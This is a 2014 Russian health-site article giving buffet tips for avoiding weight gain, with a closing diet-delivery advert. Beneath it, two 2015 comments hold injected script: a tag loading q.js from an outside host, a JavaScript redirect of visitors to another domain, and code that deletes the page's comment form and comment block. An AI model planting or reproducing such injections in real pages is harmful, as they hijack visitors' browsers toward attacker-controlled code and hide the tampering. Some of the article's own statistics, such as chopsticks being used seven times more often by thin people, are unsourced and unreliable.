Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как обхитрить шведский ст...  >>  Как обхитрить шведский стол и похудеть
 
Обратная связь
 

Как обхитрить шведский стол и похудеть

Размер шрифта
21 января 2014 00:00
  • google_analytics: false
  • Нравится

Шведский стол, буфет – еды навалом! Как же не поправится в таких «райских» условиях?! Из нашей статьи вы узнаете, как правильно вести себя, когда вокруг много вкусностей. Следуя нашим советам, вы никогда не поправитесь.

Как обхитрить шведский стол и похудеть

Далеко не все люди воспринимают шведский стол как призыв к тому, чтобы съесть как можно больше. Согласно данным исследования, при кулинарном изобилии люди с низкой массой тела ведут себя иначе, чем люди с высокой массой тела. Простые советы помогут вам сохранить фигуру даже после самого шикарного обеда.

Изучите ассортимент. Согласно данным исследования, полные люди начинают набирать еду, даже не окинув стол взглядом. Они переходят от блюда к блюду, пока не дойдут до конца стола. Худые люди, наоборот, тщательно выбирают блюдо, прежде чем положить его на тарелку. Не спешите: выберите несколько блюд и сконцентрируйте свое внимание только на них.

Возьмите маленькую тарелку. Когда вы голодны, вы стараетесь взять самую большую тарелку. Для того чтобы оградить себя от переедания, не берите большую тарелку. С помощью маленькой тарелки вы не только уменьшите объем порции, но и сократите количество подходов к столу.

Садитесь спиной к еде. Самое большое искушение шведского стола – это его внешний вид. Поэтому постарайтесь выбрать место таким образом, чтобы он не находился в поле вашего зрения. Если вы будете сидеть лицом к еде, вас не только будет смущать ее внешний вид, но и те люди, которые будут подходить за новыми порциями.

Ешьте палочками. Худые люди пользуются палочками в 7 раз чаще, чем вилкой. Когда вы едите вилкой, вы съедаете значительно больше, чем когда едите палочками. Кроме того, палочки дают возможность в полной мере ощутить вкус еды, а не только утолить голод.

Начните с овощей. Подходя к шведскому столу, обратите внимание, прежде всего, на овощи – они должны оказаться на вашей тарелке первыми. Не используйте калорийные соусы и заправки, не употребляйте сладкие газированные напитки.

Не увлекайтесь. Совсем необязательно использовать все советы одновременно – вполне достаточно одного или двух советов за раз. Даже небольшие изменения поведения позволят вам есть меньше и сохранить стройную фигуру.

Ну, а для тех, кто хочет реально похудеть создана «Диета Елены Малышевой»! Уже готовая правильная еда будет доставлена вам в любое удобное для вас место и время! Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.